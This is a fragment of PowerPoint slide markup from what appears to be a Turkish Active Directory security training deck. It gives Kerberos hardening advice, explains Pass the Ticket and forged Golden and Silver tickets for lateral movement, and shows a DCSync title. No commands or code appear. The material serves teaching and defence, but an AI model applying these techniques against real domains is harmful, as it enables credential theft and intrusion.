              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>periyodik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>değiştirilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Eğer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> normal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hesapları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanılacaksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hesaplar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>güçlü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>parolalar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>seçilmeli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>parolalar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>periyodik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>değiştirilmelidir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Servis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hesapları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>çok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>fazla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yetkiyle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>donatılmamalıdır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Özellikle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> privileged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>gruplara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üyelikleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kaldırılmalıdır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>protokolü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>güncel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sistemlerde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>varsayılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> AES </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanmakta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>fakat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> RC4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanımına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>vermektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. RC4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>daha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>zayıf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algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olduğundan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> brute-force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>saldırıları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>daha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hızlı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sonuçlanabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>nedenle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> RC4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanımı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tamamen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>devre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>dışı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bırakılabilir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89055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37EC0-3BB5-250D-A35C-921414D39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TTP 0x12 – Pass the Ticket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5AD0BA-B51B-5E41-FC53-696EEA3D42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83365"/>
            <a:ext cx="10515600" cy="32072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636287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238A6-97CB-DFA0-9A46-B1E184870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TTP 0x12 – Pass the Ticket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4D6B0-C827-4339-D0C9-0C160DA5B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TGT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> ST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>biletleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>varsayılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>koşullarda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sunucu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>belleğinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tutulmakta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>süre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>geçince</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>silinmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>saldırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yöntemi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>geçirilen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sunucu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>belleğindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> TGT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>veya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> ST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>biletleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanılarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yatayda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yayılım</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>gerçekleştirilebilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Burada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>önemli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>olan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>nokta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sunucu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>belleğinden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bilet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>verisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>birlikte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Session Key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>verisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>elde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>edilmelidir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>aksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>takdirde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>süreci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tamamlanamayacaktır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>nedenle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ağ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>üzerinden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>elde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>edilen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> TGT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> ST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>biletleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Pass the Ticket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>saldırısında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanılamamaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Eğer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>servis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>hesabı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>veya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanıcının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>NTHash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bilgisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>biliniyorsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bilgilerle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>farklı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> (Golden, Silver, TGT) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ticketlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>oluşturulup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>onlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> da Pass the Ticket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanılabilmektedir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84834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1E616-201B-A8AA-1943-F2D461C08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TTP 0x12 – Pass the Ticket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3A767D-AB52-A9EE-6AA7-B3831CBF6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02069"/>
            <a:ext cx="10515600" cy="353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5980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2A2EB-29C4-C354-7AA3-59935F47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TTP 0x13 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DCSync</a:t>
            </a:r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A6A141-AD5A-52A6-C601-9ECAC360EC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97665"/>
            <a:ext cx="10515600" cy="32072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496159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9F3C2-4B39-5BB7-7A3A-45106F48F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TTP 0x13 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DCSync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C1FC3-2089-5470-954C-88FC6BDC12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Domain </a:t>
            </a:r>
